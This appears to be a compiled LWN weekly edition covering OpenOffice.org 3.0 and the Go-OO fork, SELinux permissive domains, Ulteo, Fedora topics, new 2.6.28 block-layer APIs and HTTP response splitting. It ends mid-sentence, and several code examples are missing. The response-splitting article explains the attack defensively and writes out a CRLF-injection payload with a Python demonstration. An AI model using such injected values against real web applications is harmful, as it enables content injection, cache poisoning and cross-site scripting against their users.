 Writer has additional editing modes for multi-lingual support as well
      as wiki document editing
 Calc has a new equation solver
 Chart (graphing) has improved graphical output


The OOo extensions
repository has many different kinds of add-ons for OOo that provide
new or enhanced functionality for users.  The most popular is the PDF
import extension which allows loading PDF files into the application
for editing.  Given that OOo has long had the ability to natively export
PDFs, importing them is an excellent addition.


Clearly Sun and the OOo project see extensions as a fertile ground for
innovation by folks who are not necessarily OOo "contributors"—as
they have 
not signed the Sun
Contributor Agreement (SCA) [ PDF, currently unavailable due to the download
traffic problems ].  Sun's community manager for OOo, Louis Suarez-Potts,  
puts
it this way:

OOo 3.0 adds to that freedom by using extensions much the same way that
Firefox does: it gives all users the freedom to add new features,
functionality. At present, we have a couple of hundred, and they have
proved popular. We've also done minimal advertising. I anticipate that in
the coming months, as 3.0 gains yet more popularity (all servers are down
at the moment), there will be more and more interesting extensions out
there. 

I can see extensions that radically depart from what we consider "office"
tools---and why not? OOo is an integrated set of tools based on fairly
conservative conceptions of office software. But there is no compelling
reason to stick with the conservative past, and every reason to be
creative.


One of the new features that OOo developers are most excited about won't
affect Linux users at all.  OOo 3.0 has a native Mac OS X look and feel, rather
than the earlier X11-based interface.  A native Windows version has always
been a part of OpenOffice (and its precursor, StarOffice), but the new
default theme is said to be particularly attractive on that platform.


There are various new features aimed at those currently using—or
needing to interoperate with—Microsoft Office.  There is support for
Access database files as well as improved Visual Basic for Applications
(VBA) macro support.  Somewhat controversially, OOo 3.0 has added the
ability to read (but not write) Office Open XML (OOXML) files.  OOXML is
the newly minted standard for office documents that Microsoft and Ecma pushed through the ISO
standardization process earlier this year.


Support for OOXML is one of the contentious areas surrounding OOo.  There
are two (vocal) developer camps, one Sun-centric, the other Novell-centric;
unsurprisingly, they tend to clash over OOXML as well as development pace
and direction issues.  It has gotten to the point where a fork, called Go-OO, has come about, led by Novell's Michael
Meeks.  Go-OO's version of OOo has been adopted by several distributions,
leading some to see it as a "hostile" fork.


Sun's chief open source officer, Simon Phipps, clearly sees
Go-OO (and the 
related OO-Build) as an attempt by Novell to control OOo:

The result of this is that go-oo.org is definitely a hostile and
competitive fork of OpenOffice.org, and OO-Build is no longer a helpful
downstream since it no longer upstreams much of anything (especially for
Mac), small changes excepted. Unlike Groklaw I'd still hesitate to call
OO-Build a fork, but Go-OO is unmistakably one, just look at the web site,
the Windows build and the rhetoric. 

The motivation for Go-OO being hosted and promoted by Novell and its staff
seems unmistakable to me, as does the fact it is a Novell-sponsored
fork. They are promoting Microsoft's flakey XSLT-based OOXML support, they
are isolating Linux from OpenOffice.org (so that no-one in the main
OpenOffice.org community is able to get support contracts from Linux
users). And it is all cleverly wrapped in a community-friendly story about
hackers and their freedom and evil, controlling Sun, delivered without
interference from Novell corporate.  


Meeks's most recent look
at OOo development is the proximate cause of much of the current
sniping in various blogs.
Meeks analyzes commits to the OOo codebase to try to extract trends in the
development of the tool.  His conclusion is stark—undoubtedly
inflammatory to those in the Sun camp—"Crude as they
are - the statistics show a picture of slow disengagement by Sun, combined
with a spectacular lack of growth in the developer community." 


While there have been various responses to the analysis—including
this LWN comment
thread—there has, as yet, been no real counter-analysis that
comes to a different conclusion.  Perhaps there are other ways to slice and
dice the data that look more favorable to growth in the OOo community, but
if not, the conclusion is worrisome.  OOo is a very useful tool, used by
many, which offers a way out of Microsoft lock-in.  Because of
Novell's close association with Microsoft, people worry that Go-OO is an
underhanded means for another kind of lock-in—this time to Novell.


In what seems almost a taunt—as well as a validation of the
accusation of a hostile fork—Meeks adds a postscript to his analysis:

Why is my bug not fixed ? why is the UI still so unpleasant ? why is
performance still poor ? why does it consume more memory than necessary ?
why is it getting slower to start ? why ? why ? - the answer lies with
developers: Will you help us make OpenOffice.org better ? if so, probably
the best place to get started is by playing with go-oo.org and getting in
touch [...]


There have long been complaints about the pace of OOo development, along
with calls
for creating a foundation to oversee it.  It would seem that OOo is at
a bit of a crossroads.  If Sun's commitment is reduced, without a
corresponding increase in contributions from others, OOo could
stagnate, or Go-OO could take over.


Ostensibly, the SCA is one of the sticking points for some contributors.
They do not trust Sun not to take their contributions in a proprietary
direction.  But the conflict is really rooted in issues of control and
development 
direction: two things likely to lead to forking.  While having two forks is
perhaps suboptimal, it may lead to improvements in both the code
and the development process for OOo.


There are legitimate concerns on both sides of the issue—undoubtedly
the mostly silent user community has yet another perspective—but
there is enough bad blood between them that it is hard to see it resolving
in some relatively amicable way.  The office application suite is an
extremely lucrative product, at least in the proprietary world.  One gets
the sense that both Sun and Novell are seeing dollar signs which are clouding
their vision.  A neutral foundation of some kind might be a good first step
towards reconciliation.


		SELinux permissive domains


Readers of this page—along with the kernel page—will not find
it surprising that SELinux is a complex beast.  It is, however, the
dominant security framework for Linux, pushed hard by Red Hat, but also
being adopted, slowly, by SUSE, Ubuntu, and others.  Over the years,
through lots of hard work, it has become somewhat less complex, at least for
administrators; a new feature, called permissive domains, will help
further ease the administration of SELinux-enabled systems.


These days, SELinux has two modes, the aptly named enforcing and
permissive modes.  When in enforcing mode, SELinux will not allow
operations that are not permitted by the policy, whereas in permissive
mode, a violation is just logged and the operation is allowed to continue.
Administrators trying to track down an SELinux problem with an
application—whether a real security issue or just a problem with the
policy—can put the system into permissive mode, then study the logs
to determine what policies are being violated.  Or they can use audit2allow
to make those policy changes for them.


Until permissive domains, though, the choice between permissive and
enforcing was binary for the entire system.  By putting a system into
permissive mode, various attacks that SELinux might normally stop on other
applications would instead just be logged.  With permissive domains, a
single process, or group of related processes, can be marked as permissive,
while the rest of the system stays in enforcing mode.


Red Hat SELinux hacker Dan Walsh describes permissive
domains on his blog.  One of the motivations is to help third-party
software developers feel more comfortable about shipping SELinux policy
with their application:

Another problem SELinux has is that third party software companies want to
ship with SELinux policy for their software but do not trust that they have
tested it well enough to run their confined applications in enforcing mode.
I have talked to developers of stock market software that wanted to write
policy for an application, distribute it to a live environment of several
hundred machines, and then gather the AVCs as they happen, using this
information to fine-tune their policy.  After a long period of time, where
they saw no AVCs, they might be willing to put their policy in enforcing
mode.  In RHEL5 they need to put the entire machine in permissive mode, but
permissive domains solve this problem. 


Permissive domains are available in recently updated Fedora 9 systems and
will come standard with Fedora 10.  As Walsh shows, enabling permissive
mode for a domain is trivial:

which would put all CGI scripts into permissive mode.  And:

to remove permissive mode for the CGI script domain
(httpd_sys_script_t). 


This is definitely a nice step forward for assisting with policy
development, but there is still a lingering problem with the recommended
way to generate SELinux policies.  Walsh describes how that is done:

Finally, when someone wants to write policy for a new confined domain,  we
tell the policy writer to build a minimal policy using tools like
system-config-selinux.  Then we advise them to put the machine in
permissive mode, run the confined application, collect the AVC messages,
use audit2allow to generate new policy, and try again.  Lather, rinse,
repeat.  This puts the entire machine at risk, since it is no longer
protected by SELinux.  With permissive domains, you can mark the new domain
as permissive and avoid putting the machine at risk.


The problem, of course, is that blindly using audit2allow is
extremely dangerous.  It assumes that the application has no security
problems, that all of its accesses should be permitted—if that can be
assumed, what is SELinux for?  By taking all 
of the violations and turning them into policy changes, the application,
rather than the policy developer, decides on the access it requires.  Using
audit2allow correctly is much more complex, requiring a good
understanding of SELinux and the existing policies and domains.


To be fair to Walsh, in a related post, he does warn:

Whenever you generate policy in this way you should really examine the te
file for what rules audit2allow has generated and try [to] make sure they make
sense, and don't open a security [hole].  It is always good to ask if the
policy is good on a list like fedora-selinux.  If you believe this is a bug
in policy, please open a bugzilla.  Then we can fix the policy for others.


The audit2allow manpage is even more explicit:

Care must be exercised while acting on the output of  this  utility  to
ensure  that  the  operations  being  permitted  do not pose a security
threat. Often it is better to define new domains and/or types, or  make
other structural changes to narrowly allow an optimal set of operations
to succeed, as opposed to  blindly  implementing  the  sometimes  broad
changes  recommended  by this utility.   Certain permission denials are
not fatal to the application, in which case it  may  be  preferable  to
simply  suppress  logging  of  the denial via a dontaudit rule rather
than an allow rule.


Using audit2allow is, unfortunately, the way that most SELinux
policy is developed.  There aren't enough SELinux experts—there may
never be enough—to actually look at the code for applications and
determine a priori what the policy should look like.  So, testing
applications by running them to determine what permissions they require is
the only sane way to do it, error-prone though it may be. 


		What is Ulteo?


Gaël Duval, founder of Mandrake-Linux, started Ulteo after he was laid off by Mandriva in 2006.  The first alpha
release was announced several months later.

In the past two years, the project has had some time to mature and, with the
announcement that OpenOffice.org 3.0 is
available through Ulteo.com, it seemed like a good time to revisit the
project.

Ulteo is aimed at Windows users, and gives them a slow and easy way to
convert to Linux using the first of several sub-projects: the Ulteo Online
Desktop.  Many Linux applications are available through a Java-enabled
web browser such as Firefox or Internet Explorer.  OpenOffice.org, KPdf,
Kopete, Skype, Thunderbird + Enigmail, Gimp and Digikam, Inkscape and
Scribus and many other applications are available in the Online Desktop
without installing any new software on the PC.  A subscription to Ulteo
Premium provides extra storage for documents and other benefits.

Once users become comfortable with Linux applications, they could be
ready for the Ulteo
Application System, which is an installable system for the PC.  The
Application System features automatic document synchronization/backup,
automatic updates and upgrades, and all the applications included in the
online desktop.

The Ulteo
Virtual Desktop seems to be much the same as the Online Desktop.  It is
designed to run under Windows and allows the use of both Linux and Windows
applications.  The Virtual Desktop uses coLinux to provide the Linux
desktop on Windows.

The final Ulteo product, for now at least, is the Documents
Synchronizer.  This, like the Virtual Desktop, is Windows software but
it can be used with the Online Desktop to back up and retrieve documents,
whether these are produced locally with Windows applications or with Linux
applications using Online Desktop.

Ulteo is not something that will be of immediate interest to the average
LWN reader.  Presumably most readers are already knowledgeable about
running Linux and its applications.  However, most of us probably do know
someone who is not ready to run Linux natively.  At least some of those
people could start using the Online Desktop and become more familiar with
various Linux applications without having to download and install those
applications.  Who knows where they might go after that.

		Fedora checking community health with EKG


Measuring the health of communities is an interesting, difficult task.  The
Fedora project has recently started using a new tool, called EKG, to try to get an overview of
the demographics of the free software projects that are sponsored by
the distribution.  EKG is still young, but already provides some
interesting information.  Because it is GPL-licensed, as is the Fedora
norm, it can be picked up by other distributions or interested parties to
target their own projects.


At its core, EKG is a few Ruby scripts that process mailing list data so
that graphs can be produced.  Currently, it produces both pie charts and
line graphs that indicate the number of Red Hat posters versus those from
elsewhere.  A portion of the most
recent set of graphs can be seen at right.


Red Hat's Michael DeHaan has taken on development of EKG to use as a tool
to measure how 
well various projects are building a community separate from Red
Hat.  There are lots of free software projects that have been released by
Red Hat—or Fedora, which often amounts to the same thing—but
may or may not be seen as useful tools outside of Fedora.  By looking at
the mailing list traffic, particularly over time, some idea of which
projects are building a community, and which aren't, can be derived.  As
the project page puts it:

The premise is simple... what are the demographics behind open source
projects that we run in Fedora? 


Who posts
Who contributes
What projects are most active?
What projects need a little help?


Mailing lists are just one measure of the health of a project, of course,
so DeHaan is looking at other metrics.  Commits to the project
repository, along with the identities of the committers, would seem
an obvious choice.  Better graphs with more useful information on each axis
as well as time series of the pie charts are also on the "to do" list.
He is also looking at derived statistics that will allow direct comparison
of different projects by using equations that in some way model success.


It is difficult to draw any conclusions from the limited graphs that are
currently available.  One thing that does stand out, though, is the
popularity of gmail.com email addresses, which seem to account
for around one-quarter of posts.  One can also certainly see projects that
are completely dominated by "inside" (i.e. Red Hat) folks.  The JBoss lists
are a good example.


Projects are trying various ways to measure how well they are doing their
job; EKG is another way to do that.  For the kernel, the statistics on each 
release are gathered by LWN, as well as over longer
periods by the Linux Foundation.  Ubuntu has its Upstream Report which looks at
how well bugs are getting to upstream bug trackers.  Undoubtedly other
projects have their own ways of trying to measure their impact.


As yet, there is no mailing list for EKG development.  We look forward to
the day when EKG is applied to its own development list.  It would seem
that some kind of "metahealth" measurement of the community
could be derived from that data.


		Block layer: solid-state storage, timeouts, affinity, and more


The 2.6.28 merge window has seen the addition of a number of changes to the
block layer.  Here's a summary of the new features and APIs which have gone
in.

Solid-state storage devices

There are some enhancements aimed at improving the kernel's support
of solid state storage devices.   One of those, the discard API, has been
covered here before.  This API allows
high-level block subsystem 
users (filesystems) to indicate that a particular range of blocks no longer
contains useful data.  That allows the low-level device to incorporate
those blocks into its garbage collection scheme and to stop worrying about
their contents when performing wear leveling.


Since the initial LWN article, though, the API has changed a little.  The
way to issue a discard request is now:


The end_io() parameter seen in previous versions of the API is no
longer present.  There is no way for callers to know when the request
completes, or, indeed, if the request completes at all.  Since the caller
is indicating a lack of interest in the given sectors, it really should not
matter what the device does thereafter.

There is a filesystem-level function for creating discard requests:


Here, the interface is expecting block numbers using the filesystem block
size, rather than 512-byte sectors.
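
The difference in units comes down to a shift.  As a minimal user-space
sketch (the helper name fs_block_to_sector() is invented for illustration
and is not a kernel function), a value expressed in filesystem blocks can
be turned into 512-byte sectors by shifting it left by the base-2 logarithm
of the block size, minus 9:

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper, not kernel API: convert a block number (or a block
 * count) expressed in filesystem blocks into 512-byte sectors.
 * blocksize_bits is log2 of the filesystem block size, so 12 means
 * 4096-byte blocks and 9 means the block is exactly one sector.
 */
uint64_t fs_block_to_sector(uint64_t block, unsigned int blocksize_bits)
{
	/* A filesystem block is assumed never to be smaller than a sector. */
	assert(blocksize_bits >= 9 && blocksize_bits < 64);
	return block << (blocksize_bits - 9);
}
```

With 4096-byte blocks, for example, block 10 begins at sector 80, and a run
of 10 blocks covers 80 sectors.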

User-space programs can issue discard requests with the new
BLKDISCARD ioctl() call.  Needless to say, such
operations should be done with care; about the only logical user of this
ioctl() would be mkfs programs.
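
For the curious, a user-space caller might look something like the sketch
below.  It assumes that the ioctl() takes a pair of 64-bit values giving
the starting byte offset and the length in bytes, both multiples of 512;
the wrapper name discard_byte_range() is made up for this example.  Running
it against a real device throws away the data in the given range, so treat
it as an illustration rather than a tool.

```c
#include <errno.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/fs.h>	/* BLKDISCARD */

/*
 * Sketch only: ask the block device open on fd to discard length bytes
 * starting at byte offset.  Returns 0 on success, or -1 with errno set.
 * The name and the up-front alignment check are this example's own.
 */
int discard_byte_range(int fd, uint64_t offset, uint64_t length)
{
	uint64_t range[2] = { offset, length };

	/* Both values are assumed to need 512-byte sector alignment. */
	if ((offset | length) & 511) {
		errno = EINVAL;
		return -1;
	}
	return ioctl(fd, BLKDISCARD, range);
}
```

The caller needs a file descriptor for the block device itself, opened for
writing; an unaligned range is rejected before the kernel ever sees it.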


Block drivers which support discard requests will provide a suitable
function to the block layer:


In the absence of a "prepare discard" function, discard requests for the
device will fail.


The block layer has also added a flag by which drivers can indicate that a
device is not rotating storage, and, thus, does not suffer from seek
delays.  By setting QUEUE_FLAG_NONROT (with
queue_flag_set() or queue_flag_set_unlocked()), a driver
tells the block layer that it is working with a solid state device.  I/O
schedulers can use that information to avoid plugging the queue - a useful
technique for combining requests to rotating storage devices, but a useless
operation when there is no seek penalty to avoid.

Request affinity

On large, multiprocessor systems, there can be a performance benefit to
ensuring that all processing of a block I/O request happens on the same
CPU.  In particular, data associated with a given request is most likely to
be found in the cache of the CPU which originated that request, so it makes
sense to perform the request postprocessing on that same CPU.  With 2.6.28,
sysfs entries for block devices will include an rq_affinity variable.
If it is set to a non-zero value, CPU affinity will be turned on for that
device.  According to the patch changelog, turning this feature on can
reduce system time by 20-40% on some benchmarks.
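
As a rough illustration, the variable could be set from a small C program
as well as from the shell.  The sketch below assumes that it appears as
/sys/block/<disk>/queue/rq_affinity; both function names are invented for
this example, and writing the file requires root privileges.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Build the assumed sysfs path for a disk's rq_affinity variable in buf.
 * Returns 0 on success, -1 if the disk name is empty, contains a slash,
 * or the result does not fit in len bytes.
 */
int rq_affinity_path(char *buf, size_t len, const char *disk)
{
	int n;

	assert(buf != NULL && disk != NULL);
	if (disk[0] == '\0' || strchr(disk, '/') != NULL)
		return -1;
	n = snprintf(buf, len, "/sys/block/%s/queue/rq_affinity", disk);
	return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/*
 * Turn request affinity on (enable != 0) or off (enable == 0) for a disk.
 * Returns 0 on success, -1 on any failure.
 */
int set_rq_affinity(const char *disk, int enable)
{
	char path[256];
	FILE *f;
	int ok;

	if (rq_affinity_path(path, sizeof(path), disk) != 0)
		return -1;
	f = fopen(path, "w");
	if (f == NULL)
		return -1;
	ok = fprintf(f, "%d\n", enable ? 1 : 0) > 0;
	if (fclose(f) != 0)	/* the write may only fail at flush time */
		ok = 0;
	return ok ? 0 : -1;
}
```

A call like set_rq_affinity("sda", 1) would then enable the feature for the
first SCSI disk, if the kernel provides the variable.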


Timeout handling

Robust device drivers typically have to be written to handle cases where
devices fail to complete operations they have been instructed to do.  In a
few cases, higher-level code helps with this task; the networking layer,
for example, can track outgoing packets and let a driver know when a
transmit operation has taken too long.  In most other drivers, though, it's
up to the driver itself to notice when an operation seems to be taking too
long.

Like the network subsystem, the block layer manages queues of requested
operations.  As of 2.6.28 the block layer will, again like networking, have
a mechanism for notifying drivers about request timeouts; that, in turn,
will allow a bunch of timeout-related code to be removed from the lower
layers.  Timeout handling in the block layer can be more complex, though,
and the associated API reflects that complexity.

A block driver must register a function to handle timed-out requests:


The amount of time a request should be outstanding before timing out is set
up with:


The tracking of per-request timeouts is done within the block layer; the
timer for any individual request is started when that request is dispatched
to the driver by the I/O scheduler.  Should a request fail to complete
before the timeout period passes, the driver's timeout function will be
called with a pointer to the languishing request.  The driver then can do
one of three things:


 Figure out that, in fact, the request was completed as expected, but 
     that completion had not been noticed by the driver.  A dropped
     interrupt could bring about such a situation, for example.  In this
     case, the driver returns BLK_EH_HANDLED, and the request will
     be marked as completed.

 Decide that the request needs more time, perhaps because it has been
     re-issued by the driver.  A BLK_EH_RESET_TIMER will start the
     timer again for this request.

 Punt and return BLK_EH_NOT_HANDLED.  The block layer
     currently does nothing at all when it gets this return code; future plans
     appear to include aborting the request within the block layer when
     this return value is encountered.


If things look bad, the driver may decide to abort any outstanding
requests, reset the device, and start over.  There are a couple of new
functions which can help with this task:


These functions will abort the given request, or all requests on the queue,
as appropriate.  Part of that process involves calling the driver's timeout
handler for each aborted request.

Other changes in brief

Some other block-layer changes include:


 The handling of minor numbers has been changed, allowing disks
     to have an essentially unbounded number of partitions.  The cost of
     this change is that minor numbers may be attached to a different major
     number, and they might not all be contiguous; for this reason, drivers
     must set the GENHD_FL_EXT_DEVT flag before the extended
     numbers will be used.  See this
     article for more information on this change.

 The prototypes of blk_rq_map_user() and
     blk_rq_map_user_iov() have changed; there is now a
     gfp_mask parameter.  This allows these functions to be used
     in atomic context.

 kblockd_schedule_work() has an additional parameter
     specifying the relevant request queue.

 The new function bio_kmalloc() behaves much like
     bio_alloc(), but it does not use a mempool to guarantee
     allocations and can thus fail.


It is, all told, one of the busier development cycles for the block layer
in recent times.

		Fedora and long term support


The news
that Wikipedia was in the process of switching away from Red Hat and
Fedora—and to Ubuntu—has stirred up some Fedora
folks.  The relatively short, 13-month support cycle for Fedora releases
was fingered as a major part of the problem in a gigantic thread
on the fedora-devel mailing list.  Some would like to see Fedora be
supported for longer, so that it could be used in production environments,
but that is a fundamental misunderstanding of what Fedora has set out to
do.  


The idea of supporting Fedora beyond the standard "two releases plus one
month", which should generally yield 13 months, is not new. It was, after
all, the 
idea behind the Fedora Legacy
project.  Unfortunately, Fedora Legacy ceased operations at the end of
2006, 
largely due to a lack of interested package maintainers.  So, calls for a
"long term support" (LTS) version of Fedora are met with a fair amount of
skepticism. 


Just such a call went up in response to the Wikipedia news.  Patrice Dumas
outlined the need:

[...] it seems to me that a true Fedora LTS is
missing, that would allow those who want things that are new, including 
for testing but cannot afford changing everything each year (servers for 
example or user desktops). It seems to me that fedora ends up being used
almost exclusively as single user desktop, so that testing of other
functionalities is likely to be less widespread.


Fedora is not meant for production use, nor for those who cannot upgrade at
least yearly.  It has an entirely different mission, which
Jon Stanley sums up:

Well, in all fairness, Fedora's stated goal is to advance the state of
free software. You get that by being bleeding-edge. Unfortunately,
being bleeding edge also means not being suitable for production
environments - these are two fundamentally incompatible goals. This is
why Red Hat Linux split into two - Fedora and RHEL. RHEL is a
derivative distribution of Fedora.


Many believe that folks who want "Fedora LTS" would be better served by Red
Hat Enterprise 
Linux (RHEL) or, for those that do not want to pay for a distribution with
support, an RHEL 
derivative such as CentOS or Scientific Linux.  But those don't have the
package diversity available with Fedora.  A stable release would also want
to freeze major packages at a particular version—only backporting
security fixes into that version—which is definitely not what is done
with Fedora while it is being supported.  Dumas wants to see something that
finds a middle ground:

Fedora legacy (or fedora lts) would not be the same than centos. Maybe a
Centos + repository with more recent stuff would be, but currently I
think that there is something in the middle between fedora and centos
that is missing.


The Extra Packages for
Enterprise Linux (EPEL) project is meant to help fill that gap, by
maintaining additional packages—beyond what Red Hat
maintains—for RHEL and compatible distributions.  Typically, though,
those packages will also be held at a version level that will, with time,
grow rather obsolete, at least to those who want to more closely follow the
upstream project.  And, of course, there aren't as many packages available
for the enterprise distributions, even with EPEL, as there are for Fedora.


It would seem to be the classic tension between "bleeding edge" and stable as
described by Stanley.  Though it isn't clear how it would solve that
problem, there are calls for reviving Fedora Legacy.  There are few opposed
to the idea of continuing Fedora support—if enough people can be
found to do it—but the implementation details seem to bog things down.
There is a bit of a "chicken and egg" problem in that attracting package
maintainers is hard to do without a project to point to, but convincing the
Fedora Engineering Steering Committee (FESCo) that it is worthwhile without
having those maintainers will be difficult.


One of the sticking points is the availability of
infrastructure—servers and bandwidth primarily—for any nascent
legacy project to use.  The Fedora board is seen as being resistant to
allowing the use of the Fedora infrastructure for such a project.  In
response to someone who pointed out that the board's approval is not
required, Dumas disagrees:

When it requires cooperation with the infrastructure, it does. It is
also possible to start something external like rpmfusion, but the amount
of work is very big. My proposal only made sense if the economies of
scale realized by working inside the fedora project were realized.

Still, if somebody provides the infrastructure, sure I'll try to help
with a project similar than the one I proposed, but I cannot myself do
anything for the infrastructure part.


There is also the question of what kind of guarantees a legacy project
would make about how long it would support older releases.  Dumas and
others seem to be in favor of essentially no commitment; maintainers would
continue supporting their packages for as long as they wished.  While
there is some attraction to that idea—it certainly reduces the number
of maintainers required—it is unclear that it actually provides a
useful service.  The idea that some security fixes are better than none is
attractive, but David Woodhouse cautions against that view:

If we present the _appearance_ of a distro with security updates, while
in fact there are serious security issues being unfixed, then that is
_much_ worse than the current "That distro is EOL. Upgrade before you
get hacked" messaging.

For anything to have the Fedora name on it, it _must_ have guaranteed
security fixes for at least the highest priority issues.


As the original Fedora Legacy project wound down, 
it left just this kind of impression by promising support,
but often not delivering it.  For several years, updates
for serious security problems were delivered late, if at all.  Any new
effort in that 
direction would have to be very clear about what it was delivering
and how it planned to get the job done.
A project that offered few, if any, guarantees would not be seen as
something very useful, but making guarantees that don't get met is far
worse. 


While there are clearly Fedora users that would be interested in hanging on
to their operating system for longer than one year, it isn't clear that there
are enough of them—and, more importantly, enough maintainers—to
make a legacy project successful.  Agreement on the goal of the project,
along with the promises it would make to adopters, is important.  It is
difficult to see how the Fedora powers-that-be could allocate resources to
such a project without those things.  As Shmuel Siegel points out:

You are looking for 
infrastructure support from Fedora without indicating that there is a 
benefit to Fedora. Supply without demand is no more useful than demand 
without supply. Since Fedora views itself as "the cutting edge distro", 
you have an uphill PR fight. Give the Fedora project a reason to spend 
some of their limited resources on you. At least let them know your 
target audience and why they would be interested.


At least at this point, it doesn't seem like a revival of Fedora Legacy is
in the cards, which leaves the problem unaddressed.  Perhaps adding enough
additional packages to EPEL will allow CentOS to truly become "Fedora
LTS".  It should be noted that while the original concern that LTS users
might be switching to Ubuntu could well be true, Ubuntu LTS doesn't have a
solution to the problem of package versions slowly getting obsolete either.
Newer packages and 
stability are fundamentally at odds—trying to solve that problem is
probably far too large a job for any community distribution.


		HTTP response splitting


HTTP response splitting (HRS) is a technique that attackers can use to
inject their own content into a web page.  It exploits the way that HTTP
delimits the boundary between its headers and the page content.  It also is
an example of that classic web application security bugaboo: improper
filtering of user input. 


The basic idea is that by injecting one or more carriage-return line-feed
(CRLF) sequences into the output that a vulnerable web application returns, an
attacker can control what goes to the victim's web browser.  The HTTP
response from a web server contains two parts: the headers that describe
the content and the body which contains the HTML for the page.
Each header is delimited by one CRLF and the header section is set off from
the body by two CRLFs.  On the wire, then, the first section is the headers,
followed by an empty line and the start of the HTML content.
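
As a rough illustration of that layout, the sketch below builds a response
string and then splits it the way a client would.  The header names and
values are made up for the example (they are not LWN's actual headers), and
build_response() and split_response() are hypothetical helpers, not part of
any web framework.

```python
CRLF = "\r\n"


def build_response(headers, body):
    """End each header line with one CRLF; an empty line precedes the body."""
    head = CRLF.join(f"{name}: {value}" for name, value in headers)
    return "HTTP/1.1 200 OK" + CRLF + head + CRLF + CRLF + body


def split_response(raw):
    """Everything before the first CRLF CRLF is header; the rest is body."""
    head, _, body = raw.partition(CRLF + CRLF)
    return head.split(CRLF), body


raw = build_response(
    [("Content-Type", "text/html"), ("Set-Cookie", "name=jake")],
    "<html>...</html>",
)
header_lines, body = split_response(raw)
```

The important detail is that the client finds the header/body boundary purely
by looking for the first empty line; nothing else marks it.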


LWN's headers are generated by the web server directly, but
sometimes headers can contain information that comes from a user's
request, often in the form of cookies or redirections.  If an attacker can
sneak an extra CRLF or two into a header he controls, he can effectively
create new header lines, or inject his own body content.


Typically this is done by using the URL-encoding values for CR and LF:
%0d and %0a.  If the web application is not careful to
check for and filter those characters, the HTTP response can be split.  If,
for example, the value of the name variable is set into a cookie
without any such filtering, then a name like
"jake%0d%0a%0d%0a<html>surprise!</html>" could
lead to some rather unexpected results.  Obviously this is relatively
benign, and only impacts someone who sets their name that way, but
it does start to give an idea of the power of HRS.  Incidentally, this
example is not random; it is adapted from the code used to demonstrate a
recent Mono HRS vulnerability.
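
The effect can be reproduced with a small, self-contained sketch.  This is
not the Mono code in question; naive_set_cookie(), safe_set_cookie() and
respond() are hypothetical helpers which simply assume that the application
places the URL-decoded value directly into a Set-Cookie header.  Rejecting
CR and LF outright, as safe_set_cookie() does, is one possible defense among
several.

```python
from urllib.parse import unquote

CRLF = "\r\n"


def naive_set_cookie(name):
    """Vulnerable: the decoded user value goes straight into a header line."""
    return "Set-Cookie: name=" + name


def safe_set_cookie(name):
    """One possible defense: refuse any value containing CR or LF."""
    if "\r" in name or "\n" in name:
        raise ValueError("CR/LF not allowed in header value")
    return "Set-Cookie: name=" + name


def respond(cookie_line, page):
    """Assemble a response with the cookie as the last header."""
    return ("HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF
            + cookie_line + CRLF + CRLF + page)


# The value from the text, decoded as a web framework typically would.
name = unquote("jake%0d%0a%0d%0a<html>surprise!</html>")
raw = respond(naive_set_cookie(name), "<html>the real page</html>")

# A client splits at the first empty line, which the attacker supplied.
head, _, body = raw.partition(CRLF + CRLF)
```

With the naive version, the injected empty line ends the header section
early, so the body as seen by the client begins with the attacker's markup
rather than with the real page.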


If one can only inject headers into one's own session, it hardly merits
mention, but there are ways for an attacker to inject into a victim's
browser stream.  Perhaps the simplest is just by passing a parameter in the
URL in time-honored fashion:
http://some.vulnerable.site/app?name="...".  If the attacker can
get the victim to follow that link, they can control headers and body of
what gets returned by the server.  Depending on the application, persistent
versions, where a redirection URL, for example, was stored in a database,
might be another way for an attacker to exploit HRS.

HRS is not new; Amit Klein first described
it [PDF] in 2004, but it does keep cropping up.  As described in
Klein's paper, it can be used for cross-site scripting (XSS), web cache
poisoning, web site hijacking, and other nefarious activities.  More
recently, Jeremiah Grossman found
HRS vulnerabilities to be surprisingly widespread.  He was also
surprised at the variety and nastiness of the effects of HRS vulnerabilities.


HRS is not as well known as some of the other web application flaws, but it
is a serious problem that needs to be considered when building or auditing
such applications.  Hopefully, we are starting to see some decline in the
number of SQL injection, XSS, and other higher profile vulnerabilities,
which may mean that attackers start looking towards the more obscure for
exploitation.  In what is likely to be a never-ending battle for control of
our web applications, getting out ahead of the attacker community can only
be a good thing.


		2.6.28 merge window, part 2


As of this writing, just under 6200 non-merge changesets have been merged
into the mainline kernel since the 2.6.27 release.  This merge window
should be drawing to a close around October 24, so we are getting
closer to seeing what 2.6.28 will look like.  User-visible changes merged
since last week's update
include:


 New drivers have been merged for
     Maxim/Dallas DS3234 SPI realtime clock chips,
     VIA UniChrome Family graphics chipsets,
     Toshiba Mobile IO framebuffers,
     C-Media CM109 USB phones,
     the touchpad shipped on OLPC XO systems,
     Automata Sercos III PCI cards (via UIO),
     Delcom USB 7-segment LED displays,
     generic USB test-and-measurement devices,
     Freescale QE/CPM USB device controllers,
     Vernier Software Technologies USB spectrometers,
     GPIO-connected NAND flash devices,
     Freescale i.MX2 and i.MX3 flash controllers,
     OMAP2/OMAP3-connected OneNAND flash devices,
     Dialog DA9030/DA9034 multifunction controllers, and
     Texas Instruments TWL4030/TPS659x0 multifunction controllers.


 The driver staging tree has been moved into the mainline.
     It brings with it a new TAINT_CRAP flag and suitably tainted drivers
     for Meilhaus ME-4000 data collection boards,
     Go 7007 ("some weird device") video controllers,
     Agere ET-1310 Gigabit Ethernet controllers,
     Atmel at76c503/at76c505/at76c505a wireless USB cards,
     Alacritech SLIC Technology non-accelerated 10Gb Ethernet cards,
     Alacritech IS-NIC gigabit Ethernet cards,
     Winbond w35und wireless network adapters,
     and Prism 2.5 USB wireless network adapters (a driver which includes
     its own 802.11 stack).  Also added are an echo cancellation module and
     a driver which enables the passing of network packets over a USB link.


 A lot of work on the Intel i915 graphics driver has been merged; this
     work includes the Graphics
     Execution Manager (GEM) GPU memory management subsystem and "IGD
     OpRegion" support which enables ACPI backlight control.  It looks like
     kernel-based mode setting might not make it for 2.6.28, but much of
     the rest of the big graphics rework is now merged.

 The way video drivers handle waiting for vertical blank cycles has
     been changed to reduce interrupts - and, thus, power consumption.

 Rik van Riel's memory
     management scalability patches have, at long last, been merged.
     These patches separate the management of anonymous, file-backed, and
     completely unevictable pages, eliminating a lot of useless page scanning.

 Another VM improvement causes the system to free a page's swap space 
